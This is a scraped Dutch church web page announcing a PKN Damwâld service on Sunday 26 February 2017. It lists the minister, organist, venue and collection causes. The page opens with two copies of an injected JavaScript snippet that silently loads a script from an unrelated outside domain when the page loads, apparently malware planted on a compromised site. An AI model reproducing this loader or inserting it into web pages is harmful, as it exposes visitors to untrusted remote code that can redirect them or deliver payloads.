;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 26 februari 2017 14:00 uur - PKN Damwâld
zondag 26 februari 2017
14:00 uur

Kerkdienst zondag 26 februari 2017 14:00 uur

Informatie

Voorganger:Ds. J.F. Mol, Nijega
Organist:Jelte Cuperus
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: St. Medair Nederland
Tweede collecte: Kerk
Uitganscollecte: Kerk